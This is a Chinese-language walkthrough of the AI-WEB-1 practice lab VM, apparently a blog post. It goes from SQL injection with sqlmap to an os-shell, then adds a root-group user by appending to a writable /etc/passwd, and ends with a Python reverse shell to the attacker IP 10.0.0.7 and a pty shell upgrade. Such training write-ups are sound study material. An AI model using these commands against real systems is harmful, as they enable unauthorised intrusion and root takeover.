AIWEB1综合靶场通关教程,从外网打到内网【附靶场环境】

前言

靶场获取后台回【aiweb1】

下载之后设置为nat模式

image-20240802134452085

启动即可,不需要登录

image-20240802134504398

靶机复现

主机发现

image-20240802142459830

访问即可

image-20240802135046689

信息收集robots.txt文件

image-20240802131537718

访问尝试,原来是什么也没有的,404

image-20240802131634434

我们去访问这个上级目录,发现有一个id

image-20240802131725462

注入测试

image-20240802131805580

语法错误,存在sql注入漏洞

image-20240802131758770

抓包

image-20240802131923201

sqlmap

image-20240802131955344

爆表

image-20240802132045654

发现表里什么也没有,换思路

image-20240802132322476

没有权限

image-20240802132333392

dirb扫一下看看,有一个info.php

image-20240802132418449

网站绝对路径

image-20240802102310051

禁用的函数,没有禁用eval

image-20240802102330233

本地文件包含开启,以及php版本(%00截断,低于5.2),但似乎没什么用

image-20240802102413674

这里我们有两种方法

方式一

通过查找secure_file_priv 的值

1、DBA权限,这里我们发现可以对文件进行读写

sqlmap -u 'http://10.0.0.84/se3reTdir777/#' -data "uid=1&Operation=%E6%8F%90%E4%BA%A4" -p 'uid' --privileges

image-20240802133048751

2、secure_file_priv

image-20240802103137489

image-20240802103735767

image-20240802103735767

方式二

从phpinfo中的网站绝对路径进行拼接尝试

image-20240802104005173

image-20240802104005173

image-20240802103844650

image-20240802103844650

image-20240802131255632

image-20240802131255632

有了绝对允许上传文件的角度路径那么我们就能使用sqlmap获取shell

sqlmap获取shell

使用sqlmap的oshell

osshell原理

通过sqlmap -v 5 参数可以查看流量包

image-20240802104556564

image-20240802104556564

通过分析,得到sqlmap的osshell原理就是,通过into outfile/into dumpfile写文件的方式进行文件写入

image-20240802104629208

image-20240802104629208

然后再进行访问这个上传的写入

image-20240802104842231

image-20240802104842231

sqlmap会向这个上传的网站目录写入两个文件

1、文件上传木马文件

image-20240802105002453

image-20240802105327076

2、命令执行文件

image-20240802105104933

文件上传成功后,即可执行命令(与蚁剑不兼容)

image-20240802105247675

注意:如果你退出了这个osshell,那么这两个文件都会自动删除,导致执行不了命令

这是会话维持中,可以执行命令

image-20240802130941177

会话断开

image-20240802105431966

断开后尝试执行命令

image-20240802131009445

上传成功后,没有找到这个flag.txt文件,应该是没有权限读取

10=system('find / -name flag*');

image-20240802111914541

查看/etc/passwd权限,发现漏洞,竟然可以读写文件,我们追加一个用户

image-20240802114512582

新加用户之前创建一个登录密码

perl -le 'print crypt("123456","addedsalt")'

image-20240802114920192

新加一个用户,分到root组进行提权

echo "test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd

image-20240802114841607

靶机发现还有nc

image-20240802115137650

反弹shell,查看攻击机ip地址

image-20240802112206063

靶机nc发现没有-e参数,反弹不了shell

image-20240802121408943

看看靶机有没有python

image-20240802121454467

很好,有python,我们使用python反弹shell,攻击机开启监听

image-20240802121545185

中间我断网了,ip地址变了一下,之后操作都是这个ip

image-20240802121757867

我们尝试使用python反弹shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.7',80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

image-20240802125842841

如果没有成功,就多试几次

image-20240802125822206

我们尝试切换用户,提示必须从终端运行

image-20240802121900053

这个问题搞我半天,后来发现可以使用python调用本地shell即终端升级

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

su test
123456

image-20240802130105974

模糊查找flag的位置

image-20240802130600388

cat 即可

image-20240802130206310

感谢观看!

  • 35
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

泷羽Sec

公众号【小羽网安】

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值